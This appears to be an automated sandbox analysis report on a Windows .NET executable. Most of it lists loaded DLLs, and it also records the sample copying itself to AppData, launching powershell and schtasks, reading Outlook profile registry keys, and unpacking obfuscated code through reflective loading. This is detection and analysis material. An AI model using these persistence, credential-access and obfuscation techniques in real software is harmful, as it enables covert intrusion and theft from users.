Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process created: C:\Users\user\AppData\Roaming\aoTiGLRa.exe "C:\Users\user\AppData\Roaming\aoTiGLRa.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Section loaded: dpapi.dll

Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Ti5nuRV7y4.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Ti5nuRV7y4.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.Ti5nuRV7y4.exe.7340000.3.raw.unpack, id.cs

.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, IVgKmK05cbPEb74WYZ.cs	.Net Code: G0BCnlHg7A System.Reflection.Assembly.Load(byte[])
Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, IVgKmK05cbPEb74WYZ.cs	.Net Code: G0BCnlHg7A System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 0_2_076FBD75 push BBE80777h; ret	0_2_076FBD7A
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 0_2_076FCA49 push ebx; iretd	0_2_076FCA4A
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_0119A5BB push es; ret	14_2_0119A5C0
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_01749C30 push esp; retf 02FEh	14_2_01749D55
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_06CC9241 push es; ret	14_2_06CC9244
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 14_2_06CCC9B1 push ss; retf	14_2_06CCC9B2

Source: Ti5nuRV7y4.exe	Static PE information: section name: .text entropy: 7.760400947281738
Source: aoTiGLRa.exe.0.dr	Static PE information: section name: .text entropy: 7.760400947281738

Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, vwb3NariRhtDMCrdte.cs	High entropy of concatenated method names: 'x4X2MSSBxG', 'ekP2uPQwPi', 'uBA2vkgWsS', 'HAM2rtXtNE', 'VRP2FpQvHG', 'JED2QfUZNx', 'QHR2mGxk59', 'VVE2hYTtIE', 'A4t2fUeoXw', 'FDu2E8tbWr'
Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, GQN1FyUPZaWV4I5L4c.cs	High entropy of concatenated method names: 'mrHntEGT3', 'I4IMsvkS6', 'HSpuXLEwA', 'htEWF1YSJ', 'Ee8rOX6aj', 'crYZY6n5D', 'A67jj6qKnLPSGAWp9i', 'nn8VuTpVkrv1Y9o2hK', 'Gurhv8WmP', 'hAyE9V2hP'
